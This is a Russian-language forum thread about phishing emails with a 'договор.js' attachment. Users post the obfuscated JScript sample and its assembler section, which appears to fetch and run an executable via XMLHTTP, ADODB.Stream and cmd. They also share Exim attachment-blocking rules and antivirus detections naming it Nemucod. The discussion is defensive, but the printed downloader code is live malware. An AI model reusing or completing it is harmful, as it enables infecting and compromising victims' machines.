Рассылки на почту файлов *.js (договор.js), что это? Опции

[schweps]

Иногда приходят на почту письма с темой вот подпишите договор или трудоустройство нашего сотрудника 0_о с копией паспорта и файлом договор.js/
Нод ничего не определяет

файл содержания:

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

[code]
function ybupvyz3() {
var pkutaz5 = {
eke: "yzkokahqa",
ednev: "yqyxrojqe",
ztywcytazki: "derehbegf",
polrumtef: "ynagemi",
ogjyxrekv: "ajwazo",
urhyr: "yzruxkanf",
idruzcittol: "edzuxdu",
nsiwapca: "vfyhagg",
madqukhy: "ymxyvo",
qwiczu: "Obj"
};
return pkutaz5['qwiczu'];
}
function ewcudarorqy1() {
var uzyme0 = {
vtowopegy: "n",
emymzudapc: "ubkazhiku",
ako: "yfige",
adymyldind: "xecqota",
jelim: "igyscohnu",
quqewohzy: "uxdycqygg",
amtolt: "epedusu",
kgolu: "yxupce",
ozxesi: "uzamfali"
};
return uzyme0['vtowopegy'];
}
function gvydedujbu0() {
var oxzora0 = {
qbysqaldy: "udtarpa",
noberembo: "ssynxaxu",
thavocoko: "Obj",
adawbu: "rwulqirso",
ocbilm: "llovomi",
ymofaguj: "ddirwadygk",
inzo: "okesypca",
xwav: "ekruqjoxse",
ybid: "kvyrowna",
aroqjakb: "ipymelso"
};
return oxzora0['thavocoko'];
}
function nvasichoghy6() {
var hiwbowsad0 = {
iwefawxuhd: "profigzejf",
tyzbuxkimi: "ywjade",
yntepf: "i =",
hirufe: "ehonovz",
oqivzih: "yncymaso",
acalqeba: "ihhaxoto",
meslephem: "ogame",
ryjr: "ahypowy",
awixl: "okhupi"
};
return hiwbowsad0['yntepf'];
}
function pkyzgetpa7() {
var worki8 = {
atbelak: "ybakgaqs",
kawi: "esovty",
yjas: "oxwygy",
ipujje: "ekasgu",
akyhga: "ralraxj",
uhimgehke: "arg",
olur: "otrozluqc",
oti: "ullehjilz"
};
return worki8['uhimgehke'];
}
function rhedmet8() {
var ryhekt9 = {
qeww: "afyrete",
etme: "bsejogi",
dumixgyhe: "uqercyki",
dfexo: "epdujmyno",
ecemli: "or.",
ntomy: "ithyfyrg",
cdiptukiwni: "dikenfil",
agivfu: "wigcogbajp",
jxex: "sonirej"
};
return ryhekt9['ecemli'];
}
function kozesvaz0() {
var imzaf7 = {
opjekoj: "sowbevuk",
ovfyrixvag: "ezvavlecq",
rovk: "zlowydb",
yxu: "hor",
ivloddunc: "azdurzycr",
ledbaxhygku: "qqymohiz",
eqbufm: "eqojizb",
ivtysacsin: "yqhyxyhto",
tgucce: "walaks",
mqixe: "yzdifijg"
};
return imzaf7['yxu'];
}
function dbyhgyzto9() {
var falni9 = {
jfefwimk: "uqebha",
yhsodeli: "jlottybo",
zteqekumx: "juqgibam",
vipo: "upmela",
tobcigulo: "ytmagrowqa",
fjikoktefvo: "fafisa",
exca: "qazwacx",
oqtedko: "ykunba",
qotiruhl: "t"
};
return falni9['qotiruhl'];
}
function utjucfazemc0() {
var bexixc6 = {
kboszulp: "ghokuxv",
ityllaz: "yzkewyfi",
ditqik: "sxermol",
ijtafpybyq: "etP",
abwifb: "wcopokqi",
egdymdyf: "alropuxhe",
zfaceze: "ahvitujy",
uhzexfal: "ynuqo",
ygtyrqof: "ignyzavda"
};
return bexixc6['ijtafpybyq'];
}
function ecnutra5() {
var nohsyt2 = {
zsevtunlu: "hafderm",
esyqxowjoxd: "xycofw",
fyhro: "oclycvu",
ylec: "ygefyvmu",
fiw: "tur",
onnywcymx: "jyzurvob",
yjiwatyt: "qkygcyrquq",
ysfecgadgo: "melijiz"
};
return nohsyt2['fiw'];
}
function yndohdy9() {
var znafucci3 = {
arfo: "dlyjunwa",
ugrimm: "hforah",
lygk: "ozoqbami",
oxcogvabno: "wzozapd",
jlyhwawhobro: "('W",
poduho: "ozxyxgycse",
lednitqox: "viser",
ovxigtuw: "bgadild"
};
return znafucci3['jlyhwawhobro'];
}
function ujcojvesic6() {
var uwecv6 = {
ute: "rexkopfe",
wpyfdymwu: "ljabkysk",
ozavruwyl: "ebsavyf",
yhemgycom: "e",
urvywu: "orucok",
ybepoxtimf: "mezorwak",
okopda: "yvkyfwa",
afugbe: "yqigpuru",
xav: "guxuz"
};
return uwecv6['yhemgycom'];
}
function lqalhin2() {
var obacnydlu0 = {
awamginti: "lywon",
dytty: "bneweqpupf",
daksorj: "ejywe",
diwybk: "iqygi",
csysabim: "ijasigs",
umi: "Clo",
ozzigihyq: "yxolvoxj",
unhigtofazc: "otirxum",
ciqodwi: "odnywirwo"
};
return obacnydlu0['umi'];
}
function suxa0() {
var iwkybk7 = {
efxexexm: "nahor",
ufyvi: "eznavbyko",
cfevoqqu: "xsosotno",
uxipotu: "ebzambugi",
dimjata: "ezjexebe",
yhleqipz: "Ope",
tybebogi: "ibpovbaq",
muvnyn: "ontydi"
};
return iwkybk7['yhleqipz'];
}
function zana9() {
var oqkaznybze9 = {
nur: "ofxicma",
ghocoli: "ebarigza",
ovo: "z.C",
itawujfelh: "mbiznycar",
ziciqramqe: "ufjive",
tomuzy: "yzdysaxw",
ehbexro: "fefofo",
icnik: "olqanuzsy",
arihr: "xexrugiw",
hobobqy: "ishufadro"
};
return oqkaznybze9['ovo'];
}
function fyzheb0() {
var figpejdot6 = {
umy: "cuc",
rlidta: "ixgevzezm",
ugelud: "gjurgilr",
ovolr: "swizipgu",
pedqixasro: "ejzokqa",
idjyntuhak: "myrurlic",
xogoti: "xzyvbelxoq",
cfocejsudo: "zsisqopaf"
};
return figpejdot6['umy'];
}
function idqara7() {
var ryqigcik7 = {
yqyqkocwow: "okpypadbi",
sfedxardoqi: "qeqqehj",
pitropro: "niphon",
kira: "nsijezw",
pgim: "agarne",
mexkafaf: "unynkoqte",
oxodm: "rruwryvko",
bovzyn: "pe",
efrajrimejx: "bqohegcy",
aqfowzecu: "lizminru"
};
return ryqigcik7['bovzyn'];
}
function exenpux5() {
var zkafyf2 = {
taregto: "wesivu",
yqxupojq: "xfoskorw",
axosfe: "gpigliju",
birevi: "fmadaju",
xjybolo: "evdewej",
magnol: "usukisgo",
ssidiqkewzy: "dy",
zytke: "ywuvlo"
};
return zkafyf2['ssidiqkewzy'];
}
function japfosuwv6() {
var styxfy5 = {
wkatte: "daxqycpu",
emdekagi: "davgusso",
obegzaf: "rybsuto",
wuliboja: "elpuhqek",
alfy: "sgetsajk",
uzly: "zudgaci",
akuc: "iguxoxe",
evja: " re",
gyjedmoqa: "gvesnutp"
};
return styxfy5['evja'];
}
function yceppyb0() {
var qgonorulx7 = {
usawers: "fporics",
rjixtumu: "me",
ybunodhy: "wmehxyvtidx",
jaboqd: "torcakab",
lytudwaky: "upqehilu",
ugefroks: "uhocgenqy",
iqvebofgiq: "bapuv",
ebfuteciq: "uplylvo",
egeputi: "vpafebze"
};
return qgonorulx7['rjixtumu'];
}
function bokneqa0() {
var vimbowhaz3 = {
ejxemma: "lanconn",
eja: "nhafgorq",
ukimcuqse: "ojpivmosa",
uqibxiza: "tmylewcu",
cvopyb: "yqybova",
ife: "ngs",
ctujhik: "lcakamzy",
ikrekid: "issehru",
azqofre: "ykenly",
rpyvofusu: "oxyzyke"
};
return vimbowhaz3['ife'];
}
function mjemsipsokwu3() {
var omagki5 = {
gridfovkefmu: "zecgyn",
zoqcu: "edquthogu",
duf: "ykniqa",
jadvulydw: "angadwe",
emaviv: "ADO",
omkihmy: "ilkore",
cbulzubhu: "fychyvjy",
sgojog: "ydhozruhwe"
};
return omagki5['emaviv'];
}
function ybxapfihylj8() {
var arylu6 = {
vtammag: "yxydpisa",
mqadxuxpiqo: "ywtixzar",
ivbu: "ocpazuqe",
apsu: "fupiqa",
qwejg: "ymbapucm",
ewu: "');",
uglirexu: "jtojkowofx",
bpibusy: "plefxihyfm",
ifativ: "zkezqytt",
afetp: "dbolecw"
};
return arylu6['ewu'];
}
function hlingimydsa6() {
var byduby7 = {
zcybyswamg: "ect",
iqimafs: "uteva",
cogjiz: "kewicagt",
pucoda: "otopo",
ldefuzko: "fykamixh",
yqqut: "ydxexde",
egi: "wyxypipg",
agcyzacap: "ddinerwi",
opvexfugb: "itlanmaty",
jewudnuj: "iwvehjotqy"
};
return byduby7['zcybyswamg'];
}
function bmopnipxahsa1() {
var dada0 = {
cwivqoju: "kyhepg",
himbici: "kesyhefm",
aqqe: " va",
rkurulivt: "kvybilibd",
xiqo: "awrepvi",
dolcecewjo: "tutjiq",
ixa: "uluvxati",
avyqfavej: "icembozo",
rtaqxidox: "emrawzaqjy",
otip: "ahugna"
};
return dada0['aqqe'];
}
function uqahydje0() {
var uqak2 = {
pusl: "uxwetumy",
jyhjajuwo: "buwsow",
wumajv: "bzuwimih",
ajxe: "annywu",
zmokyvhale: "oluno",
oxlygytgewd: "kepubong",
rmezmogve: "toftyplug",
yfnef: "fdozetz",
jqiknaww: "cyp"
};
return uqak2['jqiknaww'];
}
function egekcul1() {
var geqo7 = {
oquvafdi: "ete",
dwivsufgozk: "htiwerid",
hqemx: "assumish",
syffyx: "wmacdywru",
ewmiqcogup: "awosuqpi",
imix: "tpyjjojug",
zkovwu: "epgetca",
ipohypto: "ezagkezl",
fogb: "lcoregl",
ifqeleptakz: "abmypnuse"
};
return geqo7['oquvafdi'];
}
function asot3() {
var itaqe0 = {
evbadaqy: "hduvlafbipq",
adwygyn: "ovurhij",
ifxejh: "arizyfl",
ernevm: "acelpi",
ncazwufubla: "ygcufa",
smebinj: "rde",
uzjomu: "omhejpejs",
pjesmo: "awmowe"
};
return itaqe0['smebinj'];
}
function ovupagfidx1() {
var elehqo0 = {
ohsawzytco: "alnuxzoqz",
uri: "ohogev",
yrmilizac: "vegwuks",
pnadvygkyk: "icolfavo",
hivnojno: "ert",
vedufe: "lydonv",
wbona: "osxukyrme",
owi: "gjoxucpefz",
xupeso: "lufyveq"
};
return elehqo0['hivnojno'];
}
function lbegporet3() {
var fteze0 = {
ezqyg: "nlyfhon",
rynwodaz: "ygyznegme",
rkehafqyq: "odudrozn",
udqizrumymh: "wfostel",
towe: "efefvyc",
zpokwyfvalc: "gylapyb",
xtomymuhso: "emO",
kegtatot: "ockawbys",
bilubxe: "alwemwu",
ecgasrebme: "ejhyxehu"
};
return fteze0['xtomymuhso'];
}
function jebdivtopudc3() {
var xiwhypvuwk5 = {
avol: "lfedfitcy",
yjcykele: "okitqasjy",
awhoqqoztu: "ake",
usafxo: "alanalki",
qok: "iwareg",
eqku: "nwawfeg",
zzodegi: "ubadronp",
uxyt: "ufyqedp",
ocsilbalx: "ydoxu",
xaco: "ekzakcana"
};
return xiwhypvuwk5['awhoqqoztu'];
}
function hegozyjtatt7() {
var ubvuki3 = {
uswoqx: "gpitgansu",
htudt: "pheguzzow",
cfojju: "ohizyhd",
ultiqtowus: "omcalju",
yzix: "tojacacm",
lxugka: "i.T",
ovus: "hsytypyxt",
udxyfeldiwd: "igsofe",
axlo: "jyqqacpo",
roke: "lohnyzn"
};
return ubvuki3['lxugka'];
}
function kexavyhjub5() {
var nlyvdi6 = {
daxpok: "ynagjicb",
agaswuzku: "xotuvky",
gsov: "fguctihjav",
bvyzu: "Spe",
imezgeba: "fafhoh",
hoze: "otposwy",
ujunazjakk: "iqyhpi",
tozehatci: "otygevfo",
cjevh: "ucidwumze",
oxkyno: "plugvowa"
};
return nlyvdi6['bvyzu'];
}
function bbimeqw0() {
var ikrinp0 = {
esixxi: "jqokdeccev",
epqabt: "dhodyrn",
zwyg: "cmd",
ogahxuco: "ujybodlo",
ipa: "ehveneba",
vuvkevs: "asewlyha",
nybu: "homponus",
hbohodz: "hodat",
lafmochyte: "aketox"
};
return ikrinp0['zwyg'];
}
function lydi0() {
var wmopyqbewx1 = {
upxajxosz: "righugqo",
tepvav: "flozirwi",
ekuvleqwaz: "obypbun",
javit: "rwe",
acxyxq: "viklozaz",
esezu: "ctekcow",
exucynet: "bkydzoz",
ijiqtocuk: "zqoqwub",
ibwegovi: "ikuzqodke",
ovo: "krahfixna"
};
return wmopyqbewx1['javit'];
}
function ufeqsu0() {
var uwxygxuhfy6 = {
wicrakwukfi: "alozlujo",
ecpogu: "am",
npyxtyckojz: "dahyvno",
ivxe: "noqykhuxz",
iby: "gvyqwan",
mofy: "hwyhegi",
ssopucbune: "powif",
itildimbu: "uhena",
ozdyxixda: "dofhycykk",
aby: "ybexka"
};
return uwxygxuhfy6['ecpogu'];
}
function vahorwyrxu8() {
var qrubu0 = {
tyblahcobju: "poncuxyj",
qvigmepyqe: "gfirmokl",
tipvojwetro: "vafyqmux",
lezyvho: "eshocpa",
aztylr: "Fu",
fvyqd: "povaxr",
edadzebcow: "ojgyszuwr",
qxasduxt: "xbyqepg",
flohpeq: "vxuzgohn",
bmabals: "pyrvot"
};
return qrubu0['aztylr'];
}
function rerjolpoju7() {
var ucuryp8 = {
pjetufdotbo: "bybxitu",
wmerimjaxzi: "xtatcugodh",
rgifyh: "ejtynyj",
hhip: "epsorcale",
gagdy: "nextuc",
zqoqu: "fygoki",
ymugijti: "qukfok",
dfyxgisa: "chilabva",
wkezkuzq: "yplyma",
qmoqyky: "qcu"
};
return ucuryp8['qmoqyky'];
}
function oxtefd8() {
var yrurnep8 = {
qgefcyhcu: "oqoxpokv",
utpevozu: "zqifivikx",
fzotfaz: "ydudinqe",
ovophawv: "yznuxwub",
ogce: "akomfimi",
itjo: "yfxefgesg",
upzimv: "ehpiqho",
ujxyratxi: "Get",
gkowydm: "apvupam",
zrocih: "rtogwymig"
};
return yrurnep8['ujxyratxi'];
}
function idavli1() {
var qqunyjl4 = {
ganfybidka: "efdovy",
elev: "uhuhakl",
ofu: "gujyte",
qhuxzaz: "ll",
yzerusx: "elbuqlodl",
obdefejyhq: "dmagarpozm",
vuwwygum: "cafgazu",
takicyx: "ahqyzave",
pofahi: "lokluzza",
aqxatoktat: "xentyll"
};
return qqunyjl4['qhuxzaz'];
}
function hizixpyf7() {
var werqazi7 = {
amjedaqf: "arycybu",
umjombagfys: "wrypxohre",
fira: "qynecyzn",
navvysy: "efcoro",
yjtehyjk: "ri",
rulupxozfy: "wralire",
ozuvd: "ukfojo",
atda: "ossyvy"
};
return werqazi7['yjtehyjk'];
}
function ypnehy2() {
var ybixyhc0 = {
otgelecx: "afgafoct",
qavupbymfo: "adtyxepg",
asutij: "eqkele",
xyflocyjo: "qyrdyt",
ssytu: "qjigvazt",
bgunpe: "eTo",
yhfo: "ezory",
fmyfzy: "nazzidym",
itfuw: "ixowok",
yje: "eznalyfx"
};
return ybixyhc0['bgunpe'];
}
function iwuv2() {
var ydconq2 = {
ultoxbawusc: "xwojzelkin",
wmonq: "icnigi",
huwdylihi: "zgoqasp",
rsoze: "packapti",
aqdisum: "mwesovju",
edtew: "Fil",
maggecfalgu: "jurzittyts",
ulabdyce: "hezxekdu"
};
return ydconq2['edtew'];
}
function tadho0() {
var oskyhi9 = {
ocqexy: " ac",
omyw: "ibosyp",
axupz: "ysmikuby",
ygongagp: "hyttuhduwv",
suzimo: "ubujuc",
txitepo: "yshasivi",
qbyvisvezha: "isawlin",
gogi: "ytuhu"
};
return oskyhi9['ocqexy'];
}
function hzona9() {
var omzelqi1 = {
cxogdu: "ccipfyk",
ahytwenec: "qujutuxr",
olbabuge: "wmecyluf",
cusotp: "nahpeb",
ajopu: "qhetaji",
wjaqecmove: "yxugxech",
agak: "bcapxuhu",
ilili: "ttadlibi",
ybvy: "ir/"
};
return omzelqi1['ybvy'];
}
function iwmyno3() {
var ddijozg7 = {
apol: "uxbowa",
yhyrxy: "oltakmi",
bopask: "tolisu",
ekfanpopgug: "gnacmivfemn",
rqegylqy: "ypinoxc",
ipykobt: "oqgupoda",
pporygvukk: "Fil",
evbisujg: "awomukny",
oqdubp: "ohhabime"
};
return ddijozg7['pporygvukk'];
}
function yvdihbywcimh2() {
var ybtyhb3 = {
asdizlyxga: "dypjexsu",
opqatitxuvz: "ojixtart",
zdihring: "ugismyjy",
odcachepzan: "fmyfrav",
uqjymwu: "iforzuda",
cyxer: "avnyjba",
uvuguq: "T",
uxolhuhs: "zcotucni",
hitb: "vdyqfext"
};
return ybtyhb3['uvuguq'];
}
function kwyjmogib4() {
var xotsapohf3 = {
ecilmefmuwk: "gyhycusl",
wvagrav: "lfikovy",
yssa: "uhymqy",
izykgylt: "ydrowyxe",
ssig: "animuje",
irqo: "wtimcyjru",
entocxu: "owfoski",
fwiph: "pt",
vfiwisuhpo: "alikeh"
};
return xotsapohf3['fwiph'];
}
function xvazurh6() {
var yzonanp2 = {
orenenbi: "asraqpa",
caky: "hevijma",
konfij: "ML2",
odbaqax: "uzbeny",
vifl: "ninnupyt",
gugjo: "apubo",
acra: "rvipvalizr",
uscodaqdexb: "qmipuxn"
};
return yzonanp2['konfij'];
}
function ijytihqu9() {
var erluti0 = {
pexenve: "hymqygk",
olma: "p:/",
irso: "ankerdoti",
wgiqwygjebvu: "verzuc",
mkytrepzy: "ucmewano",
utih: "yxhehany",
nony: "ebqubaha",
esodaluz: "gemguz",
alaq: "zubyshu",
faqisjykme: "tkefruni"
};
return erluti0['olma'];
}
function hmyvqabijfe7() {
var pcikcavm6 = {
iwsul: "rycfijag",
ixpywamxi: "yzyxsy",
ego: "uzozzoq",
gymzywozu: "Re",
yzyczixl: "gylyw",
sorhagega: "odzace",
ujpu: "vkemes",
ksewe: "lacbyvf"
};
return pcikcavm6['gymzywozu'];
}
function atan0() {
var jijzi1 = {
ofpyjb: "anipruq",
ebaxpefrard: "nubgexb",
huh: "egewjelke",
pywoxoxvi: "akiny",
sezg: "mhulodni",
rqyxice: ".Fi",
csusqajc: "nmaburqy",
aklimduv: "uggosdadr",
lilywku: "ohactul",
ovrimovb: "bfoqexg"
};
return jijzi1['rqyxice'];
}
function mjiftapf2() {
var ukuvaz4 = {
yfmor: "imwubudm",
kuddofi: "ysqibwi",
xhisyxjomsa: "fhozezel",
bac: "yrnigofda",
mymcufp: "ogifdemly",
anorbomukw: "anedmud",
fehu: "osserogy",
ixnazgu: "e",
ylefjibda: "sbolakpy"
};
return ukuvaz4['ixnazgu'];
}
function ufrymuli0() {
var ahtepsiq0 = {
xuvy: "zynjolu",
zvehzyhq: "ibinjyj",
sfocax: "hunist",
zezumnosa: "judywc",
obquq: "vlabef",
voxniqs: "Str",
uwi: "ockesi",
tryhro: "ixiqlora"
};
return ahtepsiq0['voxniqs'];
}
function acmempes0() {
var jdocsexp2 = {
arfirq: "emxugamm",
ukgo: "ucina",
ukmigugosq: "quqfohx",
tythepicro: "exorjo",
cuvutmur: "xupveddit",
nsovoselk: "ajuwo",
kcute: "ty",
ypuqnexo: "oqkuba",
hocte: "xpodsohy",
zgegezs: "ehmedersu"
};
return jdocsexp2['kcute'];
}
function imtelkobi6() {
var uhwuwo8 = {
zemrygk: "tlilhavu",
togogvunn: "sp",
bnoxduky: "utylez",
tkew: "yvtimte",
ovhys: "fgiptet",
ifuro: "zzuvyxko",
cejs: "byvaknyn",
ubtulupym: "wavixk"
};
return uhwuwo8['togogvunn'];
}
function ajynyze3() {
var uficq6 = {
lyrevuw: "epfaqxami",
ucmakiq: "rucaqfy",
hzempi: "pdegxohe",
ehwacyjyb: "tyl",
vqisux: "zajepdagd",
fodasolj: "akzyja",
muqmarq: "lnezoj",
pvaxmuzi: "vgokityv",
yrygryqiwk: "hlaxneha"
};
return uficq6['ehwacyjyb'];
}
function axvyjmemvadr3() {
var wlexudes9 = {
fubwexa: "syluti",
oqvemaqw: "ncunnam",
zinteka: "mlesyh",
mkavqiqydqa: "nuzcav",
xikucomri: "opsygpo",
pnoqo: "dvaqnivu",
humerzi: "exe",
adotp: "pgahzusbaf",
gqidogfi: "rixnum",
marpetx: "axhujo"
};
return wlexudes9['humerzi'];
}
function opkakzy0() {
var ifykepd1 = {
yvemfe: "agyvymu",
bzyd: "qevabgig",
ajdewkoln: "lvyfyfmyw",
qvizs: "jovjiset",
otnarse: "hnikib",
eqazvamoz: "rea",
lxypgohxixl: "uhidipdu",
gefelru: "jifsibvah"
};
return ifykepd1['eqazvamoz'];
}
function acdype7() {
var ytkuri1 = {
uggoxenif: "arxoxvi",
evcebl: "sweheliz",
oji: "qiroszu",
felma: "vbycensec",
lnovizqe: "ebucufx",
lvuqji: "zjaxlis",
odhifovbu: "ell",
viswobo: "agtaqgane",
rertila: "arcicpika"
};
return ytkuri1['odhifovbu'];
}
function gxavsegawuff2() {
var sorim7 = {
erawdalxod: "onhedeqe",
gaw: "uhughu",
axneq: "WSc",
uswycce: "optizuju",
opwijf: "azdycavso",
ohvod: "umoqno",
ogtynuc: "onlonvabo",
jarpojledm: "uxemfigo",
vywro: "irtogmyxw",
jenx: "ifgoszaru"
};
return sorim7['axneq'];
}
function zise5() {
var ljyglyqq4 = {
numwog: "2",
hzabpafza: "odrybmozka",
dhyly: "tfyxlinf",
etufwenk: "iloji",
ersawob: "ukqyfer",
katuzhekm: "pqagidne",
fjyljez: "estorde",
omorbigti: "uhuraky",
okexmafrogv: "nlufdimy"
};
return ljyglyqq4['numwog'];
}
function ofmypapho5() {
var ydepw9 = {
ihrolacq: "lbyftij",
idomx: "cuc",
hcaqawuhs: "khyngajpo",
ecnozeba: "qenomjajw",
wimm: "okunu",
detsivar: "atugvo",
qajxocsomxy: "iftyno",
kolebpogq: "subuxw",
fozcenqy: "qehlifd",
udro: "pnotgec"
};
return ydepw9['idomx'];
}
function yqzagwykq6() {
var ovdofo8 = {
anocaf: "pafujdo",
tazocsagl: "uzkynjub",
ozto: "rhojesv",
zwolwiwmaha: "zehxecw",
vpufka: "0",
xgum: "worvokqunp",
ihuho: "upgonifci",
jrohcyghip: "ugjymnare"
};
return ovdofo8['vpufka'];
}
function ralsimxaqy1() {
var enulo0 = {
sfohg: "etneqgaha",
afolod: "upybetv",
bojrisxyj: "TP",
iktejho: "dirufu",
gofyp: "joxypjamm",
ejxicodsuh: "exowegki",
vadajdag: "crasatyj",
vnyrf: "dwydovuxc",
kusymu: "iqekegq",
vnuqj: "nfihywegx"
};
return enulo0['bojrisxyj'];
}
function adifepeg1() {
var itodu0 = {
ankevmu: "oncaxe",
oqizgupu: "atypza",
hvud: "shahjewxy",
syjumosmi: "njilzaftoq",
yxytdat: "tijtefez",
ppempoh: "tirice",
lcyblozd: "mharqaxil",
ucjagu: "toqed",
yryqjyr: "fajhex",
owwynbust: "c "
};
return itodu0['owwynbust'];
}
function ukyvixnox5() {
var sismunf0 = {
ona: "ohzifow",
ipimdarru: "ugetcymfy",
uhhe: "htalufwod",
ybqinije: "netavipq",
azcudlezo: "t.S",
uxafkupo: "agedex",
myco: "narkuxgi",
urbulo: "rvelvok",
adykita: "ampenhina"
};
return sismunf0['azcudlezo'];
}
function qofogax0() {
var ecmuxwur0 = {
wecy: "ygyserd

Сообщение отредактировал schweps - Oct 6 2016, 7:12

[Morftimg]

Правильно. Потому что пока это не вирус
Когда запуститься скрипт он соберет из исходников тело заразы

На самом деле в последнее время только такое и приходит Не лениться повторять всем юзерам про опасность.

[Dandan]

Код определенно часть вируса. Но по этой части что он делает и как запускается понять нельзя.

[Allex]

Код определенно часть вируса. Но по этой части что он делает и как запускается понять нельзя.

Похоже, у спойлера есть ограничение на размер - в письме-уведомлении о теме кода гораздо больше, и в конце, после всех "функций" есть что-то типа "сборщика":

var yxox = new Function(ihyhebn6() + tadho0() + ihyminiha8() + fyzheb0() + tkoxubda1() + aguvuzysi2() + ifcot5() + taxegvofy1() + sehro3() + aceqb8() + gvydedujbu0() + ahxebvuh0() + yndohdy9() + ubegmo4() + tupmujzadud3() + sozocpexbagg3() + acdype7() + ybxapfihylj8() + bmopnipxahsa1() + nletitpy0() + rerjolpoju7() + mumge0() + nvasichoghy6() + vcimrehrugy6() + jebdivtopudc3() + ofmypapho5() + zana9() + opkakzy0() + gfejcecdylovb2() + kozesvaz0() + egmikymers5() + intabxiqodk2() + jjownersipefh3() + ovupagfidx1() + exgur5() + yxvic8() + drorezivi2() + japfosuwv6() + ecnutra5() + idipqyce3() + bjuftopvuwi0() + uqahydje0() + hegozyjtatt7() + pkyzgetpa7() + utjucfazemc0() + nhanotoki3() + ubnevuhxy4());
switch (yxox()) {
case '':
    ewhyjlali3 = apesotperda4[cryvuxagerd7() + rotu9() + dbyhgyzto9()];
    tceqkin5 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](vogjaqodti0() + kuto1() + pefnifa9() + atan0() + agykulytp0() + icnadsehceqe4() + lbegporet3() + irorv4() + imruhjekwuxe0());
    uzotly2 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](gxavsegawuff2() + afkapgixidb3() + ukyvixnox5() + ygovxifyrxi0() + iccaregx0());
    pacyfc5 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](jucinint8() + xvazurh6() + tdetrahygi0() + evpew5() + ralsimxaqy1());
    bednomha2 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](mjemsipsokwu3() + wrytdedyceh4() + ufrymuli0() + lyjhisd1());
    edehky1 = tceqkin5[oxtefd8() + kexavyhjub5() + idycmeknuv5() + lninijevy8() + yvmorpoji4() + zcigcufp6()](zise5());
    urnawxy4 = tceqkin5[vapzalk1() + wqecwi3() + jfijdifafqa0() + stezyrxafe0() + ufeqsu0() + juqu3()]();
    ncipsyzty4 = pacyfc5[ubhuxbipn5() + soxenqa1()](cyfuj2() + yvdihbywcimh2(), aptewemke4() + ijytihqu9() + wasbuhi2() + ytluhgajf8() + ofisyjgagqo1() + asot3() + lydi0() + acjyzucdy9() + bokneqa0() + ajynyze3() + ibvyshadzid7() + hwoqyhvavo0() + hzona9() + caldyhb8() + hlingimydsa6() + rhedmet8() + axvyjmemvadr3(), yqzagwykq6());
    ncipsyzty4 = pacyfc5[fixox3() + pyrhetjygaxh2()]();
    bednomha2[acmempes0() + idqara7()] = epcom1();
    labqijkus5 = pacyfc5[hmyvqabijfe7() + imtelkobi6() + pico4() + ehavixwu3() + djizizokim1() + exenpux5()];
    ogqojewk3 = ewhyjlali3[anesa5() + hizixpyf7() + kwyjmogib4() + vahorwyrxu8() + idavli1() + aswadre9() + yceppyb0()];
    ncipsyzty4 = bednomha2[suxa0() + ewcudarorqy1()]();
    ncipsyzty4 = bednomha2[qabubvebilv9() + qofogax0() + mjiftapf2()](labqijkus5);
    ncipsyzty4 = bednomha2[wuqtigmi6() + ypnehy2() + iwuv2() + ujcojvesic6()](edehky1 + urnawxy4);
    ncipsyzty4 = bednomha2[lqalhin2() + inyzusli4()]();
    ncipsyzty4 = uzotly2[ctymeval0() + badwy5()](bbimeqw0() + idemo4() + hbokkikfalufk6() + adifepeg1() + edehky1 + urnawxy4, yqzagwykq6());
    break;
}
ncipsyzty4 = tceqkin5[hiwmompe5() + egekcul1() + iwmyno3() + devi2()](ogqojewk3);

[Morftimg]

Код определенно часть вируса. Но по этой части что он делает и как запускается понять нельзя.

Ага потому, что код зашифрован хотя с виду кажется открытым.

[Vitaliy_y]

deny message = Possible Microsoft JScript attack ($found_extension)
log_message = REJECT: Bad attachment
demime = js
и
warn message = X-SS-Suspicious-Flag: YES
condition = ${if match{$mime_filename}{\N(?i)\.zip$\N}}
decode = default
condition = ${if match{${run{/usr/local/bin/unzip -l \
$mime_decoded_filename}}}\
{\N(?i)\.(ade|adp|bas|bat|chm|cmd|com|cpl|crt|exe|hlp|hta|inf|ins|isp|jse|js|lnk|mde|msc|
msi|msp|pcd|reg|scr|sct|url|vbs|vbe|wsf|wsh|wsc|wmv|wma|mp3|avi|zip|rar|7z|mpg)\n\N}}
и т.п. для 7zip и rar снимают много головной боли
настройки для exim.
При чем очень часто эту гадость не видит на drweb ни clamav и локальные виндовые антивири.

Сообщение отредактировал Vitaliy_y - Oct 6 2016, 10:12

[schweps]

вот гандоши) полюбому половина офиса себе запустило посмотреть что это за договор))

[symbian9]

залейте на обменник, хочу в виртуалке посмотреть шо оно делает)

[schweps]

залейте на обменник, хочу в виртуалке посмотреть шо оно делает)

сегодня какраз свежач0к пришел

скинул в пм ссылку
!используете на свой страх и риск! еще забанят меня)

странно но шлет на почту только мне, вродь никуда на рассылки не подписывался, мейл в инете не светится

вторая странность во вчерашнем архиве вирусов небыло (по реакции нода) сегодня пытаюсь его скачать - блокирует пишет троян.

с сегодняшним все в порядке

_____________________________
а вот результат онлайн вирус тотала


Антивирус Результат Дата обновления
Antiy-AVL Trojan/Generic.ASVCS3S.3FB 20161007
Cyren JS/Nemucod.DZ!Eldorado 20161007
F-Prot JS/Nemucod.DZ!Eldorado 20161007
GData Script.Trojan-Downloader.Nemucod.DI 20161007
Tencent Js.Trojan.Raas.Auto 20161007

[Sintorres]

deny message = Possible Microsoft JScript attack ($found_extension)
log_message = REJECT: Bad attachment
demime = js
и
warn message = X-SS-Suspicious-Flag: YES
condition = ${if match{$mime_filename}{\N(?i)\.zip$\N}}
decode = default
condition = ${if match{${run{/usr/local/bin/unzip -l \
$mime_decoded_filename}}}\
{\N(?i)\.(ade|adp|bas|bat|chm|cmd|com|cpl|crt|exe|hlp|hta|inf|ins|isp|jse|js|lnk|mde|msc|
msi|msp|pcd|reg|scr|sct|url|vbs|vbe|wsf|wsh|wsc|wmv|wma|mp3|avi|zip|rar|7z|mpg)\n\N}}
и т.п. для 7zip и rar снимают много головной боли
настройки для exim.
При чем очень часто эту гадость не видит на drweb ни clamav и локальные виндовые антивири.

Как это к постфиксу прикрутить?

[Console]

Ну к примеру Nod32 разпознал как троян, лежал в виде txt, но без расширения. Порядка 750 строчек кода.. Завтра точней скажу как обозвал антивирь( но выявил только после запуска полного сканирывания)....


UP.

JS/TrojanDownloader.NemucodCGQ



